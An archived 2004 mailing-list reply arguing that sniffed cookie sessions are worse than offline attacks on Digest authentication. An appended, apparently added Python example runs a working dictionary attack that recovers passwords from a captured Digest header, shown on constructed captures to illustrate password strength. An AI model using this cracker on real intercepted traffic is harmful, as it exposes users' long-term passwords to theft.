At 1:08 PM -0500 1/8/04, Rich Salz wrote:
>Without SSL, the risk is "offline attack on gets long-term password"
>for digest, and for cookie its "packet snarf gets limited access."
>That tradeoff alone would make the concerned (or liable) party tend
>to go for cookies, don'tcha think?
No, I don't think that's true. First of all it's not "offline attack
on gets long-term password". It's packet snarf followed by offline
attack gets long-term password. Packet snarfing is required for
both attacks.
Once the packets are snarfed, a hole that does not require any
decryption and gives immediate, time-limited access is worse than an
attack that requires a decryption that may not succeed. A strong
password is a pretty damn good defense against an offline, dictionary
attack on digest authentication. I don't see any equivalent action a
client can take to protect themselves against a cookie-based attack.
The server might be able to take a few actions to help alleviate the
problem, but in practice I doubt most server administrators are
security conscious enough to provide sufficient protection,
especially for those who aren't using SSL in the first place. *I* can
protect *myself* against your proposed attack on digest
authentication. I cannot protect myself against the attacks on cookie
session keys. I must rely on the server to do it for me. And
excepting SSL, I don't think the defenses you propose are
sufficiently effective, even if the server does implement them. :-(
--
Elliotte Rusty Harold
elharo@metalab.unc.edu
Effective XML (Addison-Wesley, 2003)
http://www.cafeconleche.org/books/effectivexml
http://www.amazon.com/exec/obidos/ISBN%3D0321150406/ref%3Dnosim/cafeaulaitA
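The offline attack the two posters are weighing, worked through as an added example (this is not code from either poster or from any project they discuss): a Digest Authorization header sniffed from a plaintext HTTP request is parsed, the RFC 2617 response is recomputed for each candidate password, and the candidate that reproduces the captured value is the user's long-term password. The captured headers, the realm, the nonces and the wordlist are all constructed here for illustration; the point is that the weak password falls to the wordlist while the strong one yields nothing, which is exactly the client-side defense the reply describes.

```python
import hashlib
import re


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri,
                    nonce, nc, cnonce, qop="auth"):
    """RFC 2617 Digest 'response' value for qop=auth (MD5 algorithm)."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def parse_authorization(header: str) -> dict:
    """Split a 'Digest k=v, k="v", ...' Authorization header into a dict."""
    body = header.split(None, 1)[1]          # drop the 'Digest' scheme token
    fields = {}
    for m in re.finditer(r'(\w+)=("([^"]*)"|([^\s,]+))', body):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


def dictionary_attack(method, header, wordlist):
    """Offline attack on a sniffed Digest header: return the password that
    reproduces the captured response, or None if no candidate matches."""
    f = parse_authorization(header)
    for candidate in wordlist:
        got = digest_response(f["username"], f["realm"], candidate, method,
                              f["uri"], f["nonce"], f["nc"], f["cnonce"],
                              f.get("qop", "auth"))
        if got == f["response"]:
            return candidate
    return None


def build_captured_header(username, realm, password, method, uri, nonce, cnonce,
                          nc="00000001"):
    """Construct what a sniffer would see on the wire for a given password.
    (Hypothetical capture built for this example; not a real trace.)"""
    resp = digest_response(username, realm, password, method, uri, nonce, nc, cnonce)
    return (f'Digest username="{username}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", qop=auth, nc={nc}, cnonce="{cnonce}", response="{resp}"')


# Constructed sample captures: same user and realm, one weak and one strong password.
REALM = "example.org"                     # assumed realm for the example
NONCE = "f1d2d2f924e986ac86fdf7b36c94bcdf"
CNONCE = "0a4f113b"
WEAK_HEADER = build_captured_header("alice", REALM, "letmein", "GET",
                                    "/private/data", NONCE, CNONCE)
STRONG_HEADER = build_captured_header("alice", REALM, "tQ7#vR9pLz!e2M", "GET",
                                      "/private/data", NONCE, CNONCE)
WORDLIST = ["password", "123456", "letmein", "qwerty", "alice", "example"]


def rfc2617_vector_ok() -> bool:
    """Sanity check against the worked example in RFC 2617 section 3.5."""
    return digest_response("Mufasa", "testrealm@host.com", "Circle Of Life", "GET",
                           "/dir/index.html", "dcd98b7102dd2f0e8b11d0f600bfb0c093",
                           "00000001", "0a4f113b") == "6629fae49393a05397450978507c4ef1"


if __name__ == "__main__":
    print("weak  :", dictionary_attack("GET", WEAK_HEADER, WORDLIST))
    print("strong:", dictionary_attack("GET", STRONG_HEADER, WORDLIST))
```

Everything the attacker needs (username, realm, nonce, cnonce, nc, uri, response) is in the one captured request, so nonce freshness does nothing to slow the guessing; only the password's entropy does. The cookie case has no equivalent step: the captured session token is replayed as-is until the server expires it.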